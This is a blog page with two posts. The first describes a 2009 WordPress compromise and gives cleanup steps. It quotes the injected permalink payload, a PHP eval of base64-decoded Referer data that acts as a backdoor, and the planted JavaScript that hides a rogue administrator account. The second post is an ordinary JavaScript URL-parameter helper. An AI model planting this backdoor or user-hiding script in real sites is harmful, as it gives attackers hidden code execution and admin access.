WordPress Code At The End Of URLs, Hack?

| Posted by watashii | Filed under WordPress

permalink

http://blog.watashii.com/2009/09/05/wordpress-code-at-the-end-of-urls-hack/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

Possibly a new WordPress hack happening at the moment?  Just got this weird code appended at the end of every URL on my WordPress blog.  This is due to the Permalink Settings being changed to a custom one.  To revert it back, simply go to your [Dashboard > Settings > Permalink], and revert the Custom Structure back to your original default option.

I’ve also noticed there is a few more users (a new Administrator and a bunch of Subscribers) being added by this hack [Dashboard > Users]. You may also notice the new administrator user is hidden from display.  What I did was to view the page source to pull their User ID.  Then edit this user to demote it to a subscriber (http://your_blog_url/wp-admin/user-edit.php?user_id=XXX), and rename their javascripted first name.  Thereafter deleted these extra subscribers.

Also I upgraded to the latest version WP 2.8.4 from 2.7.

Follow discussion here.

…         <div id=”user_superuser”><script language=”JavaScript”> var setUserName = function(){     try{         var t=document.getElementById(“user_superuser”);         while(t.nodeName!=”TR”){             t=t.parentNode;         };         t.parentNode.removeChild(t);         var tags = document.getElementsByTagName(“H3″);         var s = ” shown below”;         for (var i = 0; i < tags.length; i++) {             var t=tags[i].innerHTML;             var h=tags[i];             if(t.indexOf(s)>0){                 s =(parseInt(t)-1)+s;                 h.removeChild(h.firstChild);                 t = document.createTextNode(s);                 h.appendChild(t);             }         }         var arr=document.getElementsByTagName(“ul”);         for(var i in arr) if(arr[i].className==”subsubsub”){             var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);             if(n[1]>0){                 var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,”>Administrator (“+(n[1]-1)+”)<”);         arr[i].innerHTML=txt;         }     }           }catch(e){};      };      addLoadEvent(setUserName); </script></div>

Tags: , ,

Read more | Comments (5) | September 4th, 2009

Get URL Variables in JavaScript & HTML

| Posted by watashii | Filed under Programming, Web

The following structure stores variables within a request URL:

http://www.mydomain.com/index.html?month=January&day=Tuesday

To read the variables within the index HTML file, we must process the URL string entirely, since there is no built-in functions which magically does it.  The following JavaScript demonstrates this:

function getUrlVars()
{
  var vars = [], hash;
  var hashes = window.location.href.slice(window.location.href.indexOf('?') + 1).split('&');
  for(var i = 0; i < hashes.length; i++)
  {
    hash = hashes[i].split('=');
    vars.push(hash[0]);
    vars[hash[0]] = hash[1];
  }
  return vars;
}

To use the variables, we run the following to extract the values:

var myHash = getUrlVars();
alert(myHash['month']);   // prompts the value 'January'
alert(myHash['day']);     // prompts the value 'Tuesday'

Tags: , ,

Read more | Comments (1) | March 28th, 2009